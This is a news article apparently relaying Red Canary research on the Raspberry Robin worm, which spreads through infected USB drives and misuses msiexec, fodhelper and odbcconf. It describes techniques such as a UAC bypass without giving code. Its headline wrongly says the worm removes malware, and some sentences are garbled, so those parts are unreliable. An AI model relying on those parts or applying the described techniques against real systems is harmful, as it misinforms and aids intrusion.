New Raspberry Robin worm uses Windows Installer to remove malware

Red Canary intelligence analysts have discovered new Windows malware with worming capabilities that spreads using external USB drives.

This malware is related to a cluster of malicious activity called Raspberry Robin and was first observed in September 2021.

Red Canary’s detection engineering team detected the worm in the networks of several customers, some in the technology and manufacturing industries.

Raspberry Robin spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is connected.

Once attached, the worm spawns a new process using cmd.exe to launch a malicious file stored on the infected drive.

Legitimate Windows tools misused to install malware

It uses Microsoft Standard Installer (msiexec.exe) to reach its command and control (C2) servers, likely hosted on compromised QNAP devices and using TOR exit nodes as additional C2 infrastructure.

“While msiexec.exe downloads and executes legitimate installation packages, adversaries also use it to deliver malware,” the researchers said.

“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”

Although they have not yet found out if it establishes persistence and by what methods, they suspect that the malware is installing a malicious DLL file. [1, 2] on compromised machines to resist deletion between reboots.

Raspberry Robin launches this DLL using two other legitimate Windows utilities: fodhelper (a trusted binary for managing features in Windows Settings) and odbcconf (an ODBC driver configuration tool).

The former allows it to bypass User Account Control (UAC), while the latter will help run and configure the DLL.

Raspberry Robin Worm Infection Stream
Raspberry Robin Worm Infection Stream (Red Canary)

How and why?

Although Red Canary analysts were able to closely inspect what the new discovery does on infected systems, there are still several questions that need to be answered.

“First and foremost, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, although it’s likely to happen offline or otherwise outside of our visibility. We don’t know. nor why Raspberry Robin installs a malicious DLL,” the researchers said.

“One hypothesis is that this may be an attempt to establish persistence on an infected system, although additional information is needed to build confidence in this hypothesis.”

Since there is no information about the malicious end-stage tasks of this malware, another question that needs to be answered is what is the purpose of the Raspberry Robin operators.

Further technical information on the Raspberry Robin worm, including indicators of compromise (IOCs) and an ATT&CK of this malware, can be found in Red Canary’s report.

Comments are closed.